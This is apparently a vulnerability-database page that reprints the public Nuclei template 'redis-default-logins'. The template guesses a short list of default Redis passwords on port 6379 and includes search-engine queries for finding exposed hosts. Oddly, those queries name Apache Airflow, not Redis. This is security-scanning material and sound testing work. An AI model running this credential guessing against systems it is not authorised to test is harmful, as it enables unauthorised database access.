redis-default-logins: Redis - Default Logins

日期: 2025-08-01 | 影响软件: Redis | POC: 已公开

漏洞描述

Redis service was accessed with easily guessed credentials.

PoC代码[已公开]

id: redis-default-logins

info:
  name: Redis - Default Logins
  author: tarunKoyalwar
  severity: high
  description: |
    Redis service was accessed with easily guessed credentials.
  metadata:
    max-request: 6
    shodan-query:
      - product:"redis"
      - http.title:"airflow - dags" || http.html:"apache airflow"
      - http.title:"sign in - airflow"
    product: airflow
    vendor: apache
    fofa-query:
      - apache airflow
      - title="airflow - dags" || http.html:"apache airflow"
      - title="sign in - airflow"
    google-query:
      - intitle:"airflow - dags" || http.html:"apache airflow"
      - intitle:"sign in - airflow"
  tags: js,redis,default-login,network,vuln

javascript:
  - pre-condition: |
      isPortOpen(Host,Port)
    code: |
      var m = require("nuclei/redis");
      m.GetServerInfoAuth(Host,Port,Password);
    args:
      Host: "{{Host}}"
      Port: "6379"
      Password: "{{passwords}}"
    payloads:
      passwords:
        - ""
        - root
        - password
        - admin
        - iamadmin
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "redis_version"

      - type: word
        negative: true
        words:
          - "redis_mode:sentinel"
# digest: 490a004630440220674c74cc156555baa6c4490cb661ea5f4e9d6c89d11be7e59a32a11f7ec810e9022038fe799b537b92337796fb1e5a4d0647573121d7a5507ad2a3d9ec6a2bc18a82:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/default-logins/redis-default-logins.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐